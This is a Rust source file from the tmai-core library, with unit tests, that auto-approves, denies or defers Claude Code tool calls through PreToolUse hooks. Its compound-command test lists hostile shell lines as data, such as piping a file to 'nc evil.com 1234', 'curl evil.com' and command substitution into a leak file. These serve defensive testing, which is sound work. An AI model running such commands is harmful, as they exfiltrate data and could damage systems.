tmai-core 1.5.0

Core library for tmai - agent detection, state management, and monitoring
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291

//! PreToolUse hook-based auto-approve evaluation.
//!
//! When Claude Code sends a PreToolUse hook event, tmai can return a
//! `permissionDecision` in the HTTP response to instantly approve/deny
//! the tool call — bypassing the permission prompt entirely.
//!
//! This replaces the legacy polling-based approach (screen scraping +
//! keystroke injection) with a direct, structured, sub-millisecond path.

use tracing::debug;

use crate::auto_approve::rules::RuleEngine;
use crate::auto_approve::types::{
    AutoApproveMode, JudgmentDecision, PermissionDecision, PreToolUseDecision,
};
use crate::hooks::HookEventPayload;

use super::core::TmaiCore;

impl TmaiCore {
    /// Evaluate a PreToolUse hook event for auto-approval.
    ///
    /// Returns `Some(PreToolUseDecision)` if auto-approve is enabled and
    /// the rules engine can make a decision. Returns `None` if auto-approve
    /// is disabled or not applicable.
    ///
    /// The decision maps to Claude Code's hook response format:
    /// - `Allow` → tool proceeds without permission prompt
    /// - `Deny` → tool call is cancelled
    /// - `Defer` → tool paused, pending AI/human resolution (Hybrid mode)
    /// - `Ask` → normal permission prompt shown (fallback)
    pub fn evaluate_pre_tool_use(&self, payload: &HookEventPayload) -> Option<PreToolUseDecision> {
        let mode = self.settings().auto_approve.effective_mode();
        // Only Rules and Hybrid modes use the hook fast path.
        // Ai mode relies solely on AI judgment (too slow for synchronous hook response),
        // so it falls through to the legacy polling service.
        if matches!(mode, AutoApproveMode::Off | AutoApproveMode::Ai) {
            return None;
        }

        let tool_name = payload.tool_name.as_deref()?;
        if tool_name.is_empty() {
            return None;
        }

        // Only rule-based evaluation in the hook path (instant, <1ms).
        let engine = RuleEngine::new(self.settings().auto_approve.rules.clone());
        let result = engine.judge_structured(tool_name, payload.tool_input.as_ref());

        let decision = match result.decision {
            JudgmentDecision::Approve => PermissionDecision::Allow,
            JudgmentDecision::Reject => PermissionDecision::Deny,
            JudgmentDecision::Uncertain => {
                match mode {
                    // Hybrid mode: defer uncertain calls for AI/human resolution.
                    // The HTTP handler will hold the connection and await resolution
                    // from the DeferRegistry (AI judge or manual UI action).
                    AutoApproveMode::Hybrid => PermissionDecision::Defer,
                    // Rules-only mode: fall through to normal permission prompt.
                    _ => PermissionDecision::Ask,
                }
            }
        };

        debug!(
            tool_name,
            decision = decision.as_str(),
            reasoning = %result.reasoning,
            elapsed_ms = result.elapsed_ms,
            "PreToolUse auto-approve evaluation"
        );

        Some(PreToolUseDecision {
            decision,
            reason: result.reasoning,
            model: result.model,
            elapsed_ms: result.elapsed_ms,
        })
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::api::builder::TmaiCoreBuilder;
    use crate::auto_approve::types::AutoApproveMode;
    use crate::config::Settings;

    /// Build a TmaiCore with auto-approve in the given mode
    fn core_with_mode(mode: AutoApproveMode) -> TmaiCore {
        let mut settings = Settings::default();
        settings.auto_approve.mode = Some(mode);
        TmaiCoreBuilder::new(settings).build()
    }

    /// Build a PreToolUse payload
    fn pre_tool_use_payload(tool_name: &str, tool_input: serde_json::Value) -> HookEventPayload {
        serde_json::from_value(serde_json::json!({
            "hook_event_name": "PreToolUse",
            "session_id": "test-session",
            "cwd": "/tmp/project",
            "tool_name": tool_name,
            "tool_input": tool_input
        }))
        .unwrap()
    }

    #[test]
    fn test_off_mode_returns_none() {
        let core = core_with_mode(AutoApproveMode::Off);
        let payload = pre_tool_use_payload("Read", serde_json::json!({"file_path": "/tmp/f.rs"}));
        assert!(core.evaluate_pre_tool_use(&payload).is_none());
    }

    #[test]
    fn test_rules_mode_approves_read() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload("Read", serde_json::json!({"file_path": "/tmp/f.rs"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
        assert!(result.reason.contains("allow_read"));
    }

    #[test]
    fn test_rules_mode_approves_grep() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload("Grep", serde_json::json!({"pattern": "TODO"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
    }

    #[test]
    fn test_rules_mode_approves_glob() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload("Glob", serde_json::json!({"pattern": "**/*.rs"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
    }

    #[test]
    fn test_rules_mode_approves_cargo_test() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload =
            pre_tool_use_payload("Bash", serde_json::json!({"command": "cargo test --lib"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
        assert!(result.reason.contains("allow_tests"));
    }

    #[test]
    fn test_rules_mode_approves_git_status() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload("Bash", serde_json::json!({"command": "git status"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
        assert!(result.reason.contains("allow_git_readonly"));
    }

    #[test]
    fn test_rules_mode_approves_webfetch() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload(
            "WebFetch",
            serde_json::json!({"url": "https://docs.rs/ratatui"}),
        );
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
        assert!(result.reason.contains("allow_fetch"));
    }

    #[test]
    fn test_rules_mode_asks_for_unknown_bash() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload =
            pre_tool_use_payload("Bash", serde_json::json!({"command": "rm -rf /tmp/stuff"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Ask);
    }

    #[test]
    fn test_rules_mode_asks_for_edit() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload(
            "Edit",
            serde_json::json!({"file_path": "/tmp/f.rs", "old_string": "a", "new_string": "b"}),
        );
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Ask);
    }

    #[test]
    fn test_hybrid_mode_rules_fast_path() {
        let core = core_with_mode(AutoApproveMode::Hybrid);
        let payload = pre_tool_use_payload("Read", serde_json::json!({"file_path": "/tmp/f.rs"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        // Hybrid mode uses rules fast path in hook response
        assert_eq!(result.decision, PermissionDecision::Allow);
    }

    #[test]
    fn test_hybrid_mode_uncertain_defers() {
        let core = core_with_mode(AutoApproveMode::Hybrid);
        let payload = pre_tool_use_payload(
            "Bash",
            serde_json::json!({"command": "npm install express"}),
        );
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        // Uncertain in Hybrid mode → Defer for AI/human resolution
        assert_eq!(result.decision, PermissionDecision::Defer);
    }

    #[test]
    fn test_ai_mode_returns_none() {
        // Ai mode should NOT use rule-based hook fast path
        let core = core_with_mode(AutoApproveMode::Ai);
        let payload = pre_tool_use_payload("Read", serde_json::json!({"file_path": "/tmp/f.rs"}));
        assert!(
            core.evaluate_pre_tool_use(&payload).is_none(),
            "Ai mode should not use hook fast path"
        );
    }

    #[test]
    fn test_compound_command_falls_through() {
        let core = core_with_mode(AutoApproveMode::Rules);
        // Shell metacharacters should prevent auto-approval
        let cases = vec![
            "cargo test && rm -rf /tmp/x",
            "git status; git push --force",
            "cat file.txt | nc evil.com 1234",
            "cargo test || curl evil.com",
            "echo $(whoami) > /tmp/leak",
            "cat `which passwd`",
            "git log > /tmp/dump",
        ];
        for cmd in cases {
            let payload = pre_tool_use_payload("Bash", serde_json::json!({"command": cmd}));
            let result = core.evaluate_pre_tool_use(&payload).unwrap();
            assert_eq!(
                result.decision,
                PermissionDecision::Ask,
                "Compound command should fall through to Ask: {}",
                cmd
            );
        }
    }

    #[test]
    fn test_no_tool_name_returns_none() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload: HookEventPayload = serde_json::from_value(serde_json::json!({
            "hook_event_name": "PreToolUse",
            "session_id": "test-session"
        }))
        .unwrap();
        assert!(core.evaluate_pre_tool_use(&payload).is_none());
    }

    #[test]
    fn test_approves_cargo_fmt() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload("Bash", serde_json::json!({"command": "cargo fmt"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
        assert!(result.reason.contains("allow_format_lint"));
    }

    #[test]
    fn test_approves_cargo_clippy() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload(
            "Bash",
            serde_json::json!({"command": "cargo clippy -- -D warnings"}),
        );
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        assert_eq!(result.decision, PermissionDecision::Allow);
    }

    #[test]
    fn test_elapsed_ms_is_sub_millisecond() {
        let core = core_with_mode(AutoApproveMode::Rules);
        let payload = pre_tool_use_payload("Read", serde_json::json!({"file_path": "/tmp/f.rs"}));
        let result = core.evaluate_pre_tool_use(&payload).unwrap();
        // Rules evaluation should be sub-millisecond
        assert!(
            result.elapsed_ms < 10,
            "Expected <10ms, got {}ms",
            result.elapsed_ms
        );
    }
}